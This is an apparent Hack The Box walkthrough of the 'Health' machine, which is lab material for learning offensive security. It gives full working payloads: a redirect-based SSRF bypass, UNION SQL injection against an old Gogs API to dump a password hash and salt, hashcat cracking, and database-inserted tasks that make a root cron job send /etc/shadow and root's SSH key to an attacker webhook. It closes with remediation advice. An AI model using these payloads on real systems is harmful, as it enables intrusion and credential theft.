Hack The Box Walkthrough - Health

Hack The Box Walkthrough - Health


This was a difficult, but fun machine. It came out as an easy machine before being reclassified as medium. It took me a long time before I finally pwned it.

It started with using a web application to reach an internal application and perform SQL Injection. Then I used the same application to read files on the server and become root.


I launch rustscan to look for opened ports on the server.

$ rustscan -a target -- -A | tee rust.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ehogue/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.


22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 32:b7:f4:d4:2f:45:d3:30:ee:12:3b:03:67:bb:e6:31 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChNRnKkpENG89qQHjD+2Kt9H7EDTMkQpzin70Rok0geRogbYVckxywChDv3yYhaDWQ9RrsOcWLs3uGzZR9nCfXOE3uTENbSWV5GdCd3wQNmWcSlkTD4dRcZshaAoMjs1bwzhK+cOy3ZU/ywbIXdHvAz3+Xvyz5yoEnboWYdWtBNFniZ7y/mZtA/XN19sCt5Pcme
|   256 86:e1:5d:8c:29:39:ac:d7:e8:15:e6:49:e2:35:ed:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOR0vwVJwhe/5A7dkomT/li2XC2nvv6/4J6Oe8Xeyi/YQspx3RQGz3aG1sWTPstLu7yno0Z+Lk/GotRdyivSdLA=
|   256 ef:6b:ad:64:d5:e4:5b:3e:66:79:49:f4:ec:4c:23:9f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINgiR3y8U+HenhKVoN1EFipbmC6EjO3fWwWPUqa8EeJh
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HTTP Monitoring Tool
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There were 2 open ports:

  • 22 - SSH
  • 80 - HTTP


I launched a browser and looked at the website.


The site allowed checking if another site was up. And sent the site content to a webhook.

I started a web server on my machine and tried the application.


$ python -m http.server 80
Serving HTTP on port 80 ( ... - - [05/Jan/2023 06:34:28] code 404, message File not found - - [05/Jan/2023 06:34:28] "GET /monitored HTTP/1.0" 404 - - - [05/Jan/2023 06:34:28] code 501, message Unsupported method ('POST') - - [05/Jan/2023 06:34:28] "POST /payload HTTP/1.1" 501 -

It worked, but I needed something else to grab the content of the payload. I launched netcat on another port and used that for the payload URL.

POST /payload/ HTTP/1.1
Accept: */*
Content-type: application/json
Content-Length: 117


I started playing with sending different payloads to the application. I found out I could send it json instead of a URL-encoded form. This made it easier to read and modify in Burp Repeater.

POST /webhook HTTP/1.1
Host: target.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 224
Origin: http://target.htb
Connection: close
Referer: http://target.htb/
Upgrade-Insecure-Requests: 1

	"_token": "6RWanPgljj9laRaM3gHG9xNHPgibNdgtqUeN0EDO",
	"webhookUrl": "",
	"monitoredUrl": "",
	"frequency": "* * * * *",
	"onlyError": 0,
	"action": "Test"

I also saw that if the monitored website was up, the content was sent to the webhook.

  "message":"HTTP\/1.0 200 OK",
  "headers":{"Host":"","Date":"Thu, 05 Jan 2023 11:48:36 GMT","Connection":"close","Content-Type":"text\/html; charset=UTF-8","Content-Length":"35"}

I thought I could use Server-Side Request Forgery (SSRF) to read from the web server.

I tried monitoring things like localhost, and files on the server. But they were rejected.


There was some validation to prevent things like localhost and file://. I tried using my machine as the monitored URL and sending a redirection from it.

$ cat redirect.php            
header("Location: http://localhost/");

$ php -S 
[Thu Jan  5 06:59:48 2023] PHP 8.1.12 Development Server ( started
[Thu Jan  5 07:00:19 2023] Accepted
[Thu Jan  5 07:00:19 2023] [302]: GET /redirect.php
[Thu Jan  5 07:00:19 2023] Closing

It worked, my webhook received the content of the application.

$ nc -klvnp 8000
listening on [any] 8000 ...
connect to [] from (UNKNOWN) [] 52638
POST /payload HTTP/1.1
Accept: */*
Content-type: application/json
Content-Length: 8993
Expect: 100-continue

  "webhookUrl": "",
  "monitoredUrl": "",
  "health": "up",
  "body": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"UTF-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n    <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\n    <title>HTTP Monitoring Tool<\/title>\n    <link href=\"http:\/\/localhost\/css\/app.css\" rel=\"stylesheet\" type=\"text\/css\"\/>\n<\/head>\n<body>\n<div class=\"container\">\n        <div class=\"container\" style=\"padding: 150px\">\n\n\t<h1 class=\"text-center\">health.htb<\/h1>\n\t<h4 class=\"text-center\">Simple health checks for any URL<\/h4>\n\n\t<hr>\n\n\n\n\n\t<p>This is a free utility that allows you to remotely check whether an http service is available. It is useful if you want to check whether the server is correctly running or if there are any firewall issues blocking access.<\/p>\n\n\t<div class=\"card-header\">\n\t    Configure Webhook ..."

I was able to use it to query the server. But I already had access to the site on port 80. So that did not help much. I was going to write a script to try all ports on the server. But I remembered that RustScan did not show filtered ports. I scanned the server again, but with Nmap.

$ nmap target                  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-04 08:42 EST
Nmap scan report for target (
Host is up (0.025s latency).
Not shown: 997 closed tcp ports (conn-refused)
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp

Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds

Port 3000 was filtered. But I might be able to access it through the SSRF. I changed my redirection.

header("Location: http://localhost:3000/");

And sent my payload again. This time I got the content of a different site in the webhook payload.

  "body":"<!DOCTYPE html>\n<html>\n\t<head data-suburl=\"\">\n\t\t
  <meta name=\"author\" content=\"Gogs - Go Git Service\" \/>\n\t\t
  <meta name=\"description\" content=\"Gogs(Go Git Service) a painless self-hosted Git Service written in Go\" \/>\n\t\t
  <meta name=\"keywords\" content=\"go, git, self-hosted, gogs\">
  \u00a9 2014 GoGits \u00b7 Version: Beta 
  "message":"HTTP\/1.0 302 Found",
  "headers":{"Host":"","Date":"Thu, 05 Jan 2023 12:32:06 GMT","Connection":"close","X-Powered-By":"PHP\/8.1.12","Location":"http:\/\/localhost:3000\/","Content-type":"text\/html; charset=UTF-8","Content-Type":"text\/html; charset=UTF-8","Set-Cookie":"_csrf=; Path=\/; Max-Age=0"}

I removed the content, but we can see that the server had a very old beta version ( Beta) of Gogs.

SQL Injection

I searched for known vulnerabilities in this version of Gogs and found that it was vulnerable to SQL Injection. ExploitDB had two proofs of concept (POC). The user search was simpler, so I tried this one first.

I started by trying the user search feature.

header('Location: http://localhost:3000/api/v1/users/search?q=a');

It gave me a user back.

  "webhookUrl": "",
  "monitoredUrl": "",
  "health": "up",
  "body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce\"}],\"ok\":true}",
  "message": "HTTP/1.0 302 Found",
  "headers": {
    "Host": "",
    "Date": "Thu, 05 Jan 2023 12:51:23 GMT",
    "Connection": "close",
    "X-Powered-By": "PHP/8.1.12",
    "Location": "http://localhost:3000/api/v1/users/search?q=a",
    "Content-type": "text/html; charset=UTF-8",
    "Content-Type": "application/json; charset=UTF-8",
    "Set-Cookie": "_csrf=; Path=/; Max-Age=0",
    "Content-Length": "111"

I took note of the username and tried injecting some SQL. The code was removing spaces, so I had to use /**/ instead.

Next, I tried the payload from the POC, but it failed. So I had to start experimenting to build my own injection.

I used Order By to figure out how many fields needed to be returned by the query.

header("Location: http://localhost:3000/api/v1/users/search?q=')/**/Order/**/By/**/27/**/--/**/-");

27 fields worked.

{"body": "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce\"}],\"ok\":true}"}

But 28 failed.

header("Location: http://localhost:3000/api/v1/users/search?q=')/**/Order/**/By/**/28/**/--/**/-");
  "webhookUrl": "",
  "monitoredUrl": "",
  "health": "down"

I knew I needed to return 27 fields in my union query. I had to find out which of those fields were returned in the JSON.

header("Location: http://localhost:3000/api/v1/users/search?q='/**/AND/**/1=2)/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/**/FROM/**/user/**/where/**/('%25'%3D'");

I could use the 3rd and 15th fields to extract data.

  "data": [
      "username": "3",
      "avatar": "//1.gravatar.com/avatar/15"
  "ok": true

I cloned the Gogs’ git repository and checked out the v0.5.5 tag. I looked at the code and saw that I needed to extract the passwd and salt fields from the user table.

I extracted the hashed password.

header("Location: http://localhost:3000/api/v1/users/search?q='/**/AND/**/1=2)/**/UNION/**/ALL/**/SELECT/**/1,2,passwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/**/FROM/**/user/**/where/**/('%25'%3D'");
  "data": [
      "username": "66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37",
      "avatar": "//1.gravatar.com/avatar/15"
  "ok": true

And the salt.

header("Location: http://localhost:3000/api/v1/users/search?q='/**/AND/**/1=2)/**/UNION/**/ALL/**/SELECT/**/1,2,salt,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/**/FROM/**/user/**/where/**/('%25'%3D'");
  "data": [
      "username": "sO3XIbeW14",
      "avatar": "//1.gravatar.com/avatar/15"
  "ok": true

I needed to crack the hash, but I did not know the format I should use for hashcat. I found an issue that explained how to convert the hash to the format hashcat expected.

$ echo -n 'sO3XIbeW14' | base64          

$ perl -e 'print pack ("H*", "66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37")' | base64 

I saved those values to a file and launched hashcat.

$ cat hash.txt    

$ hashcat -a0 hash.txt /usr/share/seclists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-AMD Ryzen 7 PRO 5850U with Radeon Graphics, 2869/5803 MB (1024 MB allocatable), 6MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/seclists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:c08zWEliZVcxNA==:ZsB0ZFVFeB8QZPt/0Rd0U...9O/jc=
Time.Started.....: Tue Jan  3 06:39:54 2023 (27 secs)
Time.Estimated...: Tue Jan  3 06:40:21 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2640 H/s (7.80ms) @ Accel:256 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 72192/14344384 (0.50%)
Rejected.........: 0/72192 (0.00%)
Restore.Point....: 70656/14344384 (0.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9984-9999
Candidate.Engine.: Device Generator
Candidates.#1....: jonquil -> 011392
Hardware.Mon.#1..: Util: 96%

Started: Tue Jan  3 06:39:52 2023
Stopped: Tue Jan  3 06:40:23 2023

I tried ssh with the cracked password.

$ ssh susanne@target
susanne@target's password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-191-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan  3 11:42:34 UTC 2023

  System load:  0.01              Processes:           173
  Usage of /:   66.4% of 3.84GB   Users logged in:     0
  Memory usage: 11%               IP address for eth0:
  Swap usage:   0%

0 updates can be applied immediately.

susanne@health:~$ ls

susanne@health:~$ cat user.txt 

Getting Root

Once connected to the server, I started looking for ways to elevate my privileges. I could not run anything as sudo and I did not find any suspicious suid binaries.

I looked at the websites for credentials in configuration files. The Gogs code was not readable by my user. But the Laravel app on port 80 was.

susanne@health:~$ cat .env


I connected to the database, but I did not find anything of interest. There was a user table, but it was empty.

I created an SSH tunnel to take a better look at the Gogs installation and connected with susanne’s credentials. I found a Remote Code Execution (RCE) vulnerability in hooks. But I failed to exploit it. The endpoint to extract the hooks seems disabled. And my POST requests to create a new hook were all rejected.

I kept looking around the server. I ran pspy and saw that Artisan was running as root every minute.

2023/01/04 11:00:01 CMD: UID=0    PID=2384   | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1 

I looked at what schedule:run was doing.

protected function schedule(Schedule $schedule)
    /* Get all tasks from the database */
    $tasks = Task::all();

    foreach ($tasks as $task) {

        $frequency = $task->frequency;

        $schedule->call(function () use ($task) {
            /*  Run your task here */
            HealthChecker::check($task->webhookUrl, $task->monitoredUrl, $task->onlyError);
            Log::info($task->id . ' ' . \Carbon\Carbon::now());

It was reading tasks from the database and sending them to HeathChecker::check(). I looked at the code for this.

public static function check($webhookUrl, $monitoredUrl, $onlyError = false)
    $json = [];
    $json['webhookUrl'] = $webhookUrl;
    $json['monitoredUrl'] = $monitoredUrl;

    $res = @file_get_contents($monitoredUrl, false);
    if ($res) {

        if ($onlyError) {
            return $json;

        $json['health'] = "up";
        $json['body'] = $res;
        if (isset($http_response_header)) {
        $headers = [];
        $json['message'] = $http_response_header[0];

        for ($i = 0; $i <= count($http_response_header) - 1; $i++) {

            $split = explode(':', $http_response_header[$i], 2);

            if (count($split) == 2) {
                $headers[trim($split[0])] = trim($split[1]);
            } else {
                error_log("invalid header pair: $http_response_header[$i]\n");


        $json['headers'] = $headers;

    } else {
        $json['health'] = "down";

    $content = json_encode($json);

    // send
    $curl = curl_init($webhookUrl);
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_HTTPHEADER,
        array("Content-type: application/json"));
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $content);

    return $json;


It was performing the health check by reading the monitored URL with file_get_contents and sending the result to the webhook URL. Since I had the database credentials I could insert anything in there, bypassing the validation from the website. And the code was using file_get_contents to get the monitored URL, so I could use it to read local files.

I started by trying to read /etc/passwd.

mysql> Insert Into tasks Values (1,'', 0, '/etc/passwd', '* * * * *', NOW(), NOW());
Query OK, 1 row affected (0.00 sec)

It worked.

  "webhookUrl": "",
  "monitoredUrl": "/etc/passwd",
  "health": "up",
  "body": "root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsusanne:x:1000:1000:susanne:\/home\/susanne:\/bin\/bash\ngogs:x:1001:1001::\/home\/gogs:\/bin\/bash\nmysql:x:111:114:MySQL Server,,,:\/nonexistent:\/bin\/false\n"

Next, I extracted the /etc/shadow file and started cracking the password.

While hashcat was running, I checked to see if root had an ssh key.

mysql> Insert Into tasks Values (1,'', 0, '/root/.ssh/id_rsa', '* * * * *', NOW(), NOW());
Query OK, 1 row affected (0.00 sec)

They did.

  "webhookUrl": "",
  "monitoredUrl": "/root/.ssh/id_rsa",
  "health": "up",
  "body": "-----BEGIN RSA PRIVATE KEY-----{KEY}-----END RSA PRIVATE KEY-----"

I used the key to connect as root and read the flag.

$ chmod 600 root_id_rsa 

$ ssh -i root_id_rsa root@target   
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-191-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jan  4 11:31:32 UTC 2023

  System load:  0.0               Processes:           184
  Usage of /:   66.4% of 3.84GB   Users logged in:     1
  Memory usage: 15%               IP address for eth0:
  Swap usage:   0%

0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

root@health:~# cat root.txt 


There were a few issues with that box that could be fixed without too much work.

First, the code that read the monitored URL should not follow redirects. The code uses file_get_contents which follows redirection by default. I didn’t see a way from preventing it from following redirects. But it’s easy to do with curl. The code should have used curl to read the monitored URL.

The server was using a very old version of Gogs. The installed version is from 2014 and is beta. There is a known SQLi vulnerability in this version of Gogs. The application was not exposed to the web, but you never know if someone can find a way around that. It could be an SSRF vulnerability like in this case. Or a disgruntled employee could use it to get data they should not have access to.

The password stored in the database was also very weak. Hashcat was able to break it quickly.

The next issue is with Artisan running as root. It should have been executed as a low-privileged account. Since it was doing the same thing as the website, it should probably have run as the web server. The validations performed when posting a health check should also have been executed before performing the actions.